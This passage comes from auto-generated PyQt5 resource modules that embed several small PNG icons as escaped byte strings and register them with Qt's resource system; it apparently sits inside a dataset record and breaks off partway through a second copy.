\\x1f\\x1c\\x15\\xbdx\\xc3\\xc1w\\'1\\x95\\xbe-\\xdfP\"\\x1e\\xca\\xdc$\\xc2(&2\\x1d\\x11\\xb9M\\xf4\\x12\\xdeO\\x88\\xe0\\xc4\\x83\\x03\\xa2\\x00\\x00\\x00\\x01bKGD+$\\xb9\\xe4\\x08\\x00\\x00\\x00\\x07tIME\\x07\\xe4\\t\\x04\\x02\\x0c,^\\x9a\\xf1\\x93\\x00\\x00\\x00\\x89IDAT\\x18\\xd3U\\xcf\\xd9\\x12\\x820\\x10D\\xd1\\x8e\\x18\\x88\\xc8\\xb0\\xb8\\x05\\x01AAA\\xf3\\xff\\x1fh6\\x04\\xef[\\x9f\\xaa\\xa9J\\x80u\\x9b`\\x0b\\x1eF\\xc2\\x16\\xedx\\xbcW\\x01\\x12J]\\x94\\xe5\\xc5\\xe1x\\xc2\\xf9\"\\xa4\\xad,\\xe8Z\\xc4@%\\xfc}\\xdd(\\xbaq\\r\\x12\\x8c\\xe9\\xdd6\\xaa\\xe9\\xb2\\xbb\\x03\\xb7\\xa9.)\\x9a\\xc1\\xec\\x162\\x9d\\xe1\\xd1\\x9b\\xbd\\x82\\xe1\\xd9\\xeb\\xbd\\x82|x\\xe1\\x0fll\\x01\\x9f\\x07\\xb1\\xfcM\\x18\\x18\\'\\xfft)\\xc5D!\\xf0\\x1e\\xab_\\x9f\\x84\\xe3\\x0bP\\xe9\\x0c\\xb4\\xd8u\\xd4\\x0e\\x00\\x00\\x00%tEXtdate:create\\x002020-07-19T03:39:20+00:00\\x86g\\x0e\\\\\\x00\\x00\\x00%tEXtdate:modify\\x002019-01-08T19:49:46+00:00\\xb0r2\\xb2\\x00\\x00\\x00 
tEXtsoftware\\x00https://imagemagick.org\\xbc\\xcf\\x1d\\x9d\\x00\\x00\\x00\\x18tEXtThumb::Document::Pages\\x001\\xa7\\xff\\xbb/\\x00\\x00\\x00\\x19tEXtThumb::Image::Height\\x001068\\x8a\\xfcQ\\x92\\x00\\x00\\x00\\x18tEXtThumb::Image::Width\\x001068\\x9f\\xb5\\x8d\\x8b\\x00\\x00\\x00\\x19tEXtThumb::Mimetype\\x00image/png?\\xb2VN\\x00\\x00\\x00\\x17tEXtThumb::MTime\\x001546976986B7\\xbe\\xd0\\x00\\x00\\x00\\x12tEXtThumb::Size\\x0018237B\\x1b]y\\xed\\x00\\x00\\x00ZtEXtThumb::URI\\x00file:///data/wwwroot/www.easyicon.net/cdn-img.easyicon.cn/files/119/1190710.pngZ\\xd1vK\\x00\\x00\\x00\\x00IEND\\xaeB`\\x82\\x00\\x00\\x07\\'\\x89PNG\\r\\n\\x1a\\n\\x00\\x00\\x00\\rIHDR\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x18\\x08\\x03\\x00\\x00\\x00\\xd7\\xa9\\xcd\\xca\\x00\\x00\\x00\\x04gAMA\\x00\\x00\\xb1\\x8f\\x0b\\xfca\\x05\\x00\\x00\\x00 cHRM\\x00\\x00z&\\x00\\x00\\x80\\x84\\x00\\x00\\xfa\\x00\\x00\\x00\\x80\\xe8\\x00\\x00u0\\x00\\x00\\xea`\\x00\\x00:\\x98\\x00\\x00\\x17p\\x9c\\xbaQ<\\x00\\x00\\x02\\x01PLTE\\x00\\x00\\x00\\xae\\xad\\xb3\\x8c\\x89\\x93\\x8b\\x88\\x92\\x88\\x84\\x8f\\x8d\\x8a\\x94\\x85\\x81\\x8c\\x85\\x82\\x8c\\x8a\\x87\\x91\\x8c\\x89\\x92\\xab\\xaa\\xb0\\x8f\\x8c\\x96\\x8e\\x8b\\x95\\x8e\\x8b\\x94\\x90\\x8e\\x97\\x8b\\x87\\x92\\x9a\\x98\\xa1\\x98\\x96\\x9e\\x8e\\x8c\\x95\\x86\\x83\\x8e\\xae\\xad\\xb3\\xae\\xad\\xb3\\xaa\\xa9\\xaf\\x90\\x8d\\x97\\x8b\\x88\\x92\\x8c\\x89\\x93\\xae\\xad\\xb3\\xae\\xad\\xb3\\xaa\\xa9\\xaf\\x90\\x8d\\x96\\x8b\\x88\\x92\\x8b\\x89\\x92\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\x8b\\x88\\x92\\x8d\\x8a\\x93\\x8c\\x89\\x93\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\x8b\\x88\\x92\\x93\\x91\\x9a\\x8c\\x89\\x93\\x8b\\x88\\x92\\x8b\\x89\\x92\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\x8b\\x88\\x92\\x8b\\x88\\x92\\x8b\\x88\\x92\\x8b\\x88\\x92\\xae\\xad\\xb3\\xae\\xad\\xb3\\x8b\\x88\\x92\\x8c\\x89\\x93\\xae\\xad\\xb3\\xae\\xad\\xb3\\x8b\\x88\\x92\\x8c\\x89\\x93\\xae\
\xad\\xb3\\xaa\\xa9\\xaf\\x8f\\x8d\\x96\\x8b\\x88\\x92\\x8c\\x89\\x93\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\xab\\xaa\\xb0\\x8f\\x8c\\x96\\x8b\\x88\\x92\\x8b\\x88\\x92\\x8f\\x8c\\x96\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\x8c\\x89\\x93\\x8b\\x88\\x92\\x8b\\x88\\x92\\x8b\\x88\\x92\\x8c\\x89\\x93\\x8c\\x89\\x93\\x8c\\x89\\x93\\xae\\xad\\xb3\\x8b\\x88\\x92\\x8b\\x88\\x92\\x8b\\x88\\x92\\x8b\\x88\\x92\\xae\\xad\\xb3\\xae\\xad\\xb3\\x8c\\x89\\x93\\x8b\\x88\\x92\\x8b\\x88\\x92\\x8b\\x88\\x92\\xae\\xad\\xb3\\xae\\xad\\xb3\\x8c\\x89\\x93\\x8b\\x88\\x92\\x8b\\x88\\x92\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\x8b\\x88\\x92\\x8b\\x88\\x92\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\x8c\\x89\\x93\\x8b\\x88\\x92\\x8b\\x88\\x92\\x8b\\x88\\x92\\x8b\\x88\\x92\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\xab\\xaa\\xb0\\x8f\\x8c\\x96\\x8b\\x88\\x92\\x8e\\x8c\\x95\\xae\\xad\\xb3\\xaa\\xa9\\xaf\\x8f\\x8d\\x96\\x8b\\x88\\x92\\x8c\\x89\\x93\\xae\\xad\\xb3\\x8b\\x88\\x92\\x8c\\x8a\\x93\\xae\\xad\\xb3\\xae\\xad\\xb3\\x8b\\x88\\x92\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\x8b\\x88\\x92\\x8b\\x88\\x92\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\x8b\\x88\\x92\\x8f\\x8c\\x95\\x8c\\x89\\x93\\x8b\\x88\\x92\\x8b\\x88\\x92\\xae\\xad\\xb3\\xae\\xad\\xb3\\x8b\\x89\\x92\\x8c\\x89\\x93\\x8c\\x89\\x93\\xae\\xad\\xb3\\x90\\x8d\\x96\\x8b\\x88\\x92\\xaa\\xa9\\xaf\\x90\\x8d\\x96\\x8b\\x88\\x92\\xae\\xad\\xb3\\x00\\x00\\x00\\xb1\\xc2u\\x92\\x00\\x00\\x00\\xa6tRNS\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x03\\x13\\x15\\x15\\x14\\x06*\\xc2\\xcf\\xcf\\xceI\\x18\\x14E\\xfbo\\x07\\x14#\\xbc\\xb9+k\\xfe\\x91\\x02\\x12\\xbf*\\xbe\\xd5\\xa9\\xe8\\xee\\xa7\\xb8\\xc7\\x11\\xb8\\xc6\\x1e\\x08\\x94\\xc0\\x19\\xba\\xf4\\xf4\\xdb1\\xa1\\xdfy=<u\\xb5\\x03\\x05Ae\\x86\\xeb=6\\xd9\\xedqG+\\x04\\xcan\\xfb
\\xc3\\x13\\xce\\xf44\\xf0\\xd0\\x15\\xcf;3\\xef\\xcf\\xc5\\xfdti\\xfe\\x040N\\xea\\xdb5/\\xd5\\xf2\\x96K\\xab\\xd9m33\\xb1\\x05%\\xf0\\xef\\xc1\\x17\\xb1\\x9a\\n\\x1a\\xc3\\xc8)\\xc6\\xc4\\xad\\xef\\xb7\\xd7\\xc1\\x9f\\x02\\x8a|\\x04,\\xba\\xcc\\x17\\x0bQ\\x16!\\xcc\\x15\\x04\\r\\xb7\\x9c\\xe1\\x00\\x00\\x00\\x01bKGD\\x00\\x88\\x05\\x1dH\\x00\\x00\\x00\\tpHYs\\x00\\x00\\x00d\\x00\\x00\\x00d\\x00\\x0f\\x96\\xc5\\xdd\\x00\\x00\\x00\\x07tIME\\x07\\xe4\\t\\x19\\x080\\x1eJZ\\xd3x\\x00\\x00\\x01\\x8aIDAT(\\xcfc`\\x80\\x02F\\x11Q1q\\tI&\\x06$\\xc0\\x08\\x06R\\xd22\\xb2r\\xf2\\xccLLL,\\xacpq\\x05EFF%\\xe5e\\xcbW\\xa803\\xa9\\xaa1\\xb3\\xb1B\\xc5\\xd554\\xb5\\x18\\xb5u\\x80\\x12\\xbaz\\xfa\\xba\\x06\\x86\\xcc\\xec\\xac`\\tu\\xa3\\x95+\\x8dMLW\\x02%\\xcc\\xcc-V\\xac\\xb04d\\xe6\\x00IXY\\xaf\\x84\\x00\\xa0\\x04\\x04\\xd8\\xd8r\\x82$\\xec\\xec\\xd1%\\x1c\\x1c\\x99\\xc0F):A$\\x9c] \\xe2\\xaen\\xcc\\xcc\\x10\\xb7\\xba\\x83\\x84=<\\xbd\\xbc}\\\\A\\x12\\xbe~\\xcc\\x9cL\\x0c\\xfe\\x01\\x81A\\xc1 \\xf1\\x10F.n\\x8e\\xd00\\xa0DxDdT4\\x83h\\x0c\\xc4\\x1cO\\xa0NV\\x1e\\x8eX\\xb0aq\\xf1\\t\\x0c\\x8a\\x89`\\xf1\\xa4\\x10FF\\x06\\x06V\\xa6\\xe4\\x14\\xb0Lj\\x1a\\x83b:D\"\\x03$\\xc1\\xcb\\x94\\x99\\x05\\x96\\xc8Nc\\x10\\xcd\\xc9\\x05\\xcb\\xe4\\x01\\x8d\\xe2\\xe5c\\xce/\\x00K\\xc8I0\\x14\\x16\\x15\\xe7\\x95\\x00%J\\xcb\\x80\\x96\\xf3\\x97W\\x00E+\\xab\"\\xaa%\\xc1\\xce\\xad\\x01i\\xa9\\xad\\xabo\\xc8\\x07\\x89\\xafhlb\\x86x\\xa4\\x19b\\x8dNK+\\xc4\\x9c\\xb6v&\\xb0\\xcf\\xad:\\xd0\\x83\\xa4\\xb3\\x0b,\\xd1\\xdd\\x83.\\xd1\\x0b\\r\\xab\\xbe\\xfe\\x95+\\'L\\x9c\\x04\\x92\\xc8\\x9a<\\x05\\xe8$7f\\x01HDIM\\x9d\\xd6=}\\x06Hb\\xe6\\xac\\xd9s\\xe6\\xba1\\x0b\\nA\\xa3p\\xde|F\\xc6@\\xa0D\\xc1\\x02f\\xe6\\x85\\x8b\\x98\\x05y\\x90\\x13C\\xc0b\\x19Y\\xcbLf`j\\x10\\xe6AI*\\xfe\\x8abK\\x12\\x962\\xc3\\xf8\\x00/\\\\\\xba\\x88\\xe8\\x0b:,\\x00\\x00\\x00%tEXtdate:create\\x002020-07-19T03:39:18+00:00;\\x07G\\xd8\\x00\\x00\\x00%tEXtdate:modify\\x002020-05-02T01:28:55+00:00H\\x1ew\\xe4\\x00\\x00\\x00 
tEXtsoftware\\x00https://imagemagick.org\\xbc\\xcf\\x1d\\x9d\\x00\\x00\\x00ctEXtsvg:comment\\x00 Generator: Adobe Illustrator 19.0.0, SVG Export Plug-In . SVG Version: 6.00 Build 0) \\xceH\\x90\\x0b\\x00\\x00\\x00\\x18tEXtThumb::Document::Pages\\x001\\xa7\\xff\\xbb/\\x00\\x00\\x00\\x18tEXtThumb::Image::Height\\x00587.%\\x1cG\\x00\\x00\\x00\\x17tEXtThumb::Image::Width\\x00587\\xbd\\xd4L\\x1a\\x00\\x00\\x00\\x19tEXtThumb::Mimetype\\x00image/png?\\xb2VN\\x00\\x00\\x00\\x17tEXtThumb::MTime\\x001588382935\\x93\\xf3{S\\x00\\x00\\x00\\x12tEXtThumb::Size\\x0032762BPG\\x06\\xdb\\x00\\x00\\x00ZtEXtThumb::URI\\x00file:///data/wwwroot/www.easyicon.net/cdn-img.easyicon.cn/files/125/1257328.png\\xf9g\\xb6\\x19\\x00\\x00\\x00\\x00IEND\\xaeB`\\x82\\x00\\x00\\x07\\xd2\\x89PNG\\r\\n\\x1a\\n\\x00\\x00\\x00\\rIHDR\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x18\\x08\\x06\\x00\\x00\\x00\\xe0w=\\xf8\\x00\\x00\\x00\\x04gAMA\\x00\\x00\\xb1\\x8f\\x0b\\xfca\\x05\\x00\\x00\\x00 cHRM\\x00\\x00z&\\x00\\x00\\x80\\x84\\x00\\x00\\xfa\\x00\\x00\\x00\\x80\\xe8\\x00\\x00u0\\x00\\x00\\xea`\\x00\\x00:\\x98\\x00\\x00\\x17p\\x9c\\xbaQ<\\x00\\x00\\x00\\x06bKGD\\x00\\xff\\x00\\xff\\x00\\xff\\xa0\\xbd\\xa7\\x93\\x00\\x00\\x00\\tpHYs\\x00\\x00\\r\\xd7\\x00\\x00\\r\\xd7\\x01B(\\x9bx\\x00\\x00\\x00\\x07tIME\\x07\\xe4\\t\\x19\\x0804\\x91\\xe1\\x1a\\xae\\x00\\x00\\x05]IDATH\\xc7\\xdd\\x95M\\x88\\x9dW\\x19\\xc7\\x7f\\xef\\xf7}\\xe7\\xde\\xb93\\x99\\xef\\xc9$M\\x1a\\xd3N\\x1d\\x9bYD\\x0c\\xba\\xb0h\\xa0v\\x157\\x8a\\xb80ED\\x10\\xf1\\x03\\\\\\x99M\\x11\\x04\\x17\\x82\\x0b\\x91Z\\xe8\\xca\\x8d\\x90\\xd2\\x9d\\x8a\"\\xb8\\xb2\\xa2B[\\xd2&\\xd1&i\\x12\\x93L\\xe6\\xde\\x99\\xb93s\\xe7~\\xbf\\xf7}\\xcf9\\xcf\\xe3\\xe2\\xdeI\\x8dXq\\xed\\x03\\x7f\\xce\\xe1,\\xce\\xef\\xf9?\\xcfs8\\x1e\\x1f\\x12/\\x7f\\xeb\\x02\\xf1\\xecql\\xb7Iif\\x99\"\\x9c`\\xd0\\xef\\x91\\xed\\xd7\\xf1\\x87\\x1d\\xdez\\xd0\\xe2\\xfc3\\x0b|\\xfb\\x95\\xdf\\xf0\\xdf\"\\xf8O\\x87?\\xff\\xee\\x17\\x90\\xce\\x0e\\xd3\\xab\\x9fd>6\\x95\\x81\\x84\\x9f\\xe8u\\xbb\\x
e7\\x8b\\xacw\\xd6\\x137\\x9dR\\xb4\\xfb\\x1a\\x0f\\xe7\\x13\\xcb\\xf9\\xb3O\\xf3\\x87+w>\\x14\\xe0\\xbdr\\xf9u\\xa6\\xaaU\\x96fg\\xa9\\xa4)\\xbe\\xef\\xd3\\xdb\\xba\\xcf\\x9d\\x95\\x17(\\xfd\\xee\\xa5\\xcf\\xde\\xdfn^\\xda\\xddo~\\\\U\\x13\\x0f<g\\x8d\\xf1\\xd5\\xfd-%\\xff\\xc9\\x8f\\xcf\\xd5\\x7f\\xfd\\xdb\\x13?\\xd0x\\xf6\\x18Y\\x96\\xd1\\xedv\\xd9\\xdfo\\xb2Y\\xabq\\xfb\\xf6\\x1d\\xb6\\xb7\\xea\\x84\\x9e\\xe7ya\\x10DI\\x14\\xf9\\xe54\\xf5\\xe3(\\xf2g\\xd6\\xce\\xb2\\xf9\\xfa\\x0f\\x9f\\xbf~\\xb7\\xf6\\xf2 \\xcf\\xcb\\x9f:\\xff\\xc2p\\xe5\\xe4\\xe9\\xe0\\xc1\\x83\\x87\\xfe\\xb5+o\\xe9\\xee\\x83\\xdbg;\\xd6\\xfd\\xe2{\\x7f]\\xbe\\xf4\\x95\\xf3k\\xbf\\xea\\r2\\xf2<\\x17@DEDDU\\xd5\\x01}\\xef\\xa7\\xbf|\\xed\\xa4\\xc0\\x8f\\x82 XL\\xe3$\\xf4}/\\xf2\\x86\\xfdp\\xf3\\xca\\x9fO\\x1dt\\xbbs_\\xfc\\xea7\\xf3\\xd5\\xd5\\xd5\\xa4\\xdd\\xe9\\xf2\\xc6\\x9f\\xfe\\xc2\\xb5\\xbf\\xdf\\xa0\\xdbi\\xd9A\\xedV\\xe8\\x99\\xac7\\xf5\\xc4G\\xeb-\\xe3\\xbb|\\x98K^\\xe4\\xae\\xc8s\\xc9\\xf3B\\xf2<\\xaf[S|\\'\\x0c\\xc3`2+\\xcc\\xf3\\x85\\xb1\\xf3Y6\\xc49\\xc1ooS\\xaf\\xd7\\xf8\\xf4\\xe7\\xbf\\xc4\\xfa\\xb3\\xcf&\\x9e\\x07mU\\xaa\\xd5\\ns3G\\xf0\\x83 \\xcc\\xbaK\\xf46\\xde\\xab\\xec\\xdf\\xb8\\xfet\\x93IT\\x05TQU\\x00Tu\\t\\x95R\\x98&\\t\\xb9q\\xd6\\x88\\xc5Y\\x87\\x88EZ{\\x04I\\xca\\xd2\\xb1\\x13tz}\\xac\\xb38\\x11\\xd2R\\x89\\xead\\x85\\xbc((MN\\xd3\\xf1#\\xc83\\x82\\xb8\\x8c\\x11\\x1d\\x03\\xe4\\x10\\xe0P%4\\x85Q\\x15\\xc1Z\\x8b8A\\xac\\xc5d\\x19~\\x10\\xb2w\\xd0\\xe6\\xee\\xc6C\\x92(\"\\n\\x03\\xc49\\xc20\\xc0\\xf7=\\x02\\xdf\\xc7)8k 
\\x12T\\x14\\x18\\x03\\x14\\x14\\x05\\x15\\xc2A\\x96!\\xa2\\xe3\\xec\\x05g\\x1d\\x8aG1\\x1c\\xb0\\xf1p\\x93a^P\\x99H\\x99H\\x12\\x0eZm\\xb2l\\x88)\\n\\xac)(\\x86}\\xc0\\xc3\\x89\\xa0\\x87\\xe5QAG\\x16F\\x80~\\x96\\x11\\x04\\x11\\xceZT\\x15\\xe3\\x04\\xa2\\x14\\xc9\\x0746\\xee\\x12\\x97&(\\x8a\\x82,\\x8ei\\xec\\xed\\xd1j\\xb5\\xc9\\x869\\xed\\xdd:\\xc3^\\x87dj\\x0ek\\x05\\xe5\\x10p\\xd8\\x87\\xd1>\\xcc\\xb2!I\\x02\\xce9T\\x15g-R\\xaa\\x12\\xa5e\\x1a\\xb7\\xae\\x82\\x1f2\\xbbr\\x824Ih\\xec\\xee\\x8df}{\\x93\\xbd{7H\\xfc\\x90\\\\\\x13\\xac8\\xfcQ\\xdd\\xc7\\xa5\\xf9\\x17@Q\\x18<?\\xc0Z\\x87\\x8a\\xe0\\xac\\xc5\\x12\\x12.\\x9c\\x84\\xeeu\\xee\\xbf\\xfdGv\\xee-\\x92Vgi\\xee6\\xe86\\x1b\\xf4\\x9b;\\x94\\xf1\\xf8\\xccb\\x99[}\\xc3\\xbd\\xb0J\\xd3\\xf4\\x1f\\xcb^U\\xf1PBc\\x0cA\\x10\\x8c2\\x17\\xc5Z\\x87s\\x0e\\x1bMR9u\\x06}x\\x9b\\xf6\\xd6\\x06;\\xff\\xb8\\x895\\x16Q!*MP\\x89\\'\\xa8\\x86\\xc2z\\xf54\\x13\\xfd\\x9c\\x1b14\\xb2\\xce\\xa3\\xcc\\x0f\\xfb\\x10Zk\\xb1\\xc6b\\x9dC\\x9c\\xe0\\xdc\\x08 \\xcea\\xfd\\x94\\xe0\\xe83\\x1c\\x99=\\x8e\\x1b\\xf6\\x11Q\\x0e\\x0e\\x0e\\xd8\\xda\\xd9\\xe5\\xc0xL\\xf5\\x16XMS>2YF\\xdb\\x82\\xc4\\x8e\\xc6p\\x0c\\x19\\r+\\xa1s\\x0e\\xeb\\x1c\\xceZ\\x9c\\x93\\xb1\\x93\\xf14\\xe9\\xc8\\x91%B\\xa2*\"\\xc2\\xc0\\xb51\\xd6\\x81\\x07\\xef\\x99&\\xa1\\xe7\\xf3\\x84_\\xe6X\\\\AsAKJ#k\\x8f](\\xa1\\xb3\\x0e\\x17\\xd8\\x0f\\xc6\\xd4\\t\"\\x0e\\xeb\\xec\\xbf9\\x921\\xd8\\xa2*xx\\xb4\\xf3\\x1e\\xef\\x8a\\x83d\\x91\\xa3\\x12\\xb3\\xa0\\tJ\\x15-\\t\\x8d\\xac\\xed!\\x82/\\xceyn$\\x8c\\xb18g\\xc7\\xcd\\x1e\\xbb\\xb2n$7Z\\xc5\\xb9\\x0f^\\xacB;\\xef\\xf3\\xcep\\x8b\\xba_ 
N8R\\xf8\\xacj\\x95\\xc90\\xd1\\xcc\\xe4\\x9eo\\x8a\\xc2\\x16y\\xd16\\x85y\\xfcB\\xebF\\r\\xb7\\xf6\\xd1\\xe5\\xce\\x8d\\\\\\x1e>*U\\xc1\\xf3\\xa0=\\xec\\xf1\\xcep\\x8b\\x9d\\xd8\\xe1\\xfb\\xb0Z\\xda\\xeb-\\x98\\x9dW7\\xb6[\\xb5po\\xabvW\\x94\\x17\\x81sa\\x14\\xaf\\x07a\\xb4\\xe6\\x07\\xe1IU\\xe6\\x14\\x12\\x15yT\\xba\\xc3\\xbd\\xa2x\\x80\\xaa\\xa0\\x825E\\xde\\xa8u\\xda7\\x8b\\xb8{\\xedsK\\xcb\\xd1\\xf2t\\xfd\\xed\\xa7\\x1a\\xf7.\\xbfv\\xf1\\xb9<L\\xcb\\xe5b~\\xf9\\xd8\\x9b_\\xfb\\xfeKo\\x9e\\x9b\\xf2\\xc2\\x99\\xf9\\xc5\\xe9\\x85\\x95\\xe3+\\xe5\\xc9\\xa9\\xd5\\xb8\\x94\\x9e\\x89\\xe2\\xe4L\\x10DO\\xf9A\\xb0\\xec\\xfbAUU\\x02gmnM\\xb1\\x93\\xf5\\xfb\\xef\\x0f\\x07\\xfdw\\x07\\xbd\\xee\\xd5\"\\xcfo\\xd5a\\xf3\\xea\\xfbW\\x9b\\xaa\\x97\\xf3\\x9b\\xcf}\\x9d/\\xff\\xec\\r\\xbc\\xc7\\xbe7\\xcfca\\xe58\\xa7\\xd7\\xd6\\xb9p\\xf1\\x1b\\\\\\xbax\\xc1\\x07*3\\xf3K\\x0b\\xd5#\\xb3\\xa7\\xca\\xd5\\xa9\\xb5<\\xeb/\\xed\\xed\\xd4j\\xfdv\\xe7\\xbe1E\\x03h\\x01\\x9d\\xb1\\xb2\\xf5\\xa3s\\xd2\\xec\\xb5\\xd8\\xecX\\xfe\\xa7\\x08\\xa3\\x88\\'W?\\xc6\\xab\\xbf\\xbf\\x02\\xe0\\x03\\xd1X\\xf1X\\xe1\\xf8\\xfc\\xff4\\xfe\\tP\\xc9\\xce\\x14aj\\x10F\\x00\\x00\\x00%tEXtdate:create\\x002020-07-19T03:39:19+00:00\\x9dpLl\\x00\\x00\\x00%tEXtdate:modify\\x002019-01-08T17:54:06+00:00\\xfa\\xaed\\x88\\x00\\x00\\x00 tEXtsoftware\\x00https://imagemagick.org\\xbc\\xcf\\x1d\\x9d\\x00\\x00\\x00\\x18tEXtThumb::Document::Pages\\x001\\xa7\\xff\\xbb/\\x00\\x00\\x00\\x18tEXtThumb::Image::Height\\x00512\\x8f\\x8dS\\x81\\x00\\x00\\x00\\x17tEXtThumb::Image::Width\\x00512\\x1c|\\x03\\xdc\\x00\\x00\\x00\\x19tEXtThumb::Mimetype\\x00image/png?\\xb2VN\\x00\\x00\\x00\\x17tEXtThumb::MTime\\x001546970046\\xc48\\x95\\x8f\\x00\\x00\\x00\\x13tEXtThumb::Size\\x00152098B\\xe5\\x15\\x0c\\xcb\\x00\\x00\\x00ZtEXtThumb::URI\\x00file:///data/wwwroot/www.easyicon.net/cdn-img.easyicon.cn/files/106/1066238.png9:*\\r\\x00\\x00\\x00\\x00IEND\\xaeB`\\x82'\n )\nqt_resource_name = (\n 
b'\\x00\\x03\\x00\\x00wG\\x00p\\x00n\\x00g\\x00\\x04\\x00\\x06\\xfa^\\x00i\\x00c\\x00o\\x00n\\x00\\x0b\\x05\\xff\\xda\\x07\\x001\\x001\\x003\\x007\\x002\\x006\\x004\\x00.\\x00p\\x00n\\x00g\\x00\\x0e\\x02\\xd3\\xb9\\x87\\x00d\\x00e\\x00a\\x00l\\x00 \\x00s\\x00m\\x00a\\x00l\\x00l\\x00.\\x00p\\x00n\\x00g\\x00\\x07\\t\\xc7W\\xa7\\x00s\\x00e\\x00t\\x00.\\x00p\\x00n\\x00g\\x00\\x0b\\x0f)N\\xc7\\x00p\\x00r\\x00e\\x00v\\x00i\\x00e\\x00w\\x00.\\x00p\\x00n\\x00g'\n )\nqt_resource_struct_v1 = (\n b'\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x0c\\x00\\x02\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x03\\x00\\x00\\x006\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x01\\xe2\\x00\\x00\\x00\\x1a\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00X\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x05\\x91\\x00\\x00\\x00l\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x0c\\xbc'\n )\nqt_resource_struct_v2 = (\n b'\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x0c\\x00\\x02\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x006\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x01\\xe2\\x00\\x00\\x01tV\\xe3?\\xc3\\x00\\x00\\x00\\x1a\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x01h.\\xd5\\xff8\\x00\\x00\\x00X\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x05\\x91\\x00\\x00\\x01t\\xc4s:\\x8f\\x00\\x00\\x00l\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x0c\\xbc\\x00\\x00\\x01t\\xc4s\\xadC'\n )\nqt_version = [int(v) for v in QtCore.qVersion().split('.')]\nif qt_version < [5, 8, 0]:\n rcc_version = 1\n qt_resource_struct = qt_resource_struct_v1\nelse:\n rcc_version = 2\n qt_resource_struct = qt_resource_struct_v2\n\n\ndef qInitResources():\n 
QtCore.qRegisterResourceData(rcc_version, qt_resource_struct,\n qt_resource_name, qt_resource_data)\n\n\ndef qCleanupResources():\n QtCore.qUnregisterResourceData(rcc_version, qt_resource_struct,\n qt_resource_name, qt_resource_data)\n\n\nqInitResources()\n",
"step-4": "from PyQt5 import QtCore\nqt_resource_data = (\n b'\\x00\\x00\\x01\\xde\\x89PNG\\r\\n\\x1a\\n\\x00\\x00\\x00\\rIHDR\\x00\\x00\\x00(\\x00\\x00\\x00(\\x08\\x06\\x00\\x00\\x00\\x8c\\xfe\\xb8m\\x00\\x00\\x01\\xa5IDATx\\x9c\\xed\\xd8?k\\x14A\\x1c\\x87\\xf1OB,\\x8dE\\x88X\\x0b\"$ \\xa4\\xb0I\\xa3(\\x8a\\x08\\xfei$M\\xf0\\xcc\\xebJaR\\xa8/\\xc1\\xca\" 6\\x82XYX\\x08*h\\xa2D\\xc54\\x81\\xa8\\x9bb8\\x18\\xe6vo/\\x97\\x9d5\\x1c\\xfb\\xc0\\xc0\\xdd\\xcc\\xee\\xcd\\xb3\\xbf\\xd9\\xfd\\xde\\xdc\\xd1\\xd1q2\\xb8\\x8f\\xef(\\x8e\\xd8\\xbe\\xe2V\\x1b\\x82\\xdb\\xb8<\\xc6y7\\xf0\\xbea\\x97R\\x8a1\\xcf;\\x83_M\\x8a\\xa4L\\xe7\\xfc\\xf0&\\x98x\\xc1}\\xfcs\\xf4\\x87+n\\xdfp\\xb7n\\xa2q\\xef\\xc1&X\\xc6\\xa7\\xba\\x83\\xfe\\xa7\\xe0\\xd0\\xf9\\'\\xfe\\x1e\\xcc\\xceD\\x08\\xae\\na|\\x9c\\'\\xb5\\xae\\x89^\\x1f`=\\x95\\xa8\\xbaIg\\xf1\\x03\\x0b#\\\\HS\\x9c\\xc3\\xef\\xfe\\x9b\\xba\\n\\xae\\xe0\\x05\\xde\\xe54J\\xb8\\x87\\xe7igU\\x05_\\xe2NV\\x9dA^\\xe1v\\xdaY&xA\\xd8N\\xcd\\xe46\\x8a\\xb8\\x88/\\xf1\\x9c\\xc3\\x96\\xf8!\\x9e\\xe2Of\\xa9\\x98\\x1e\\x9e\\x94\\xcd\\x99Vp\\x1a\\x1fq\\xa9\\x05\\xa9x\\xce\\xcfX,\\x1bL\\x05\\xaf\\xe1M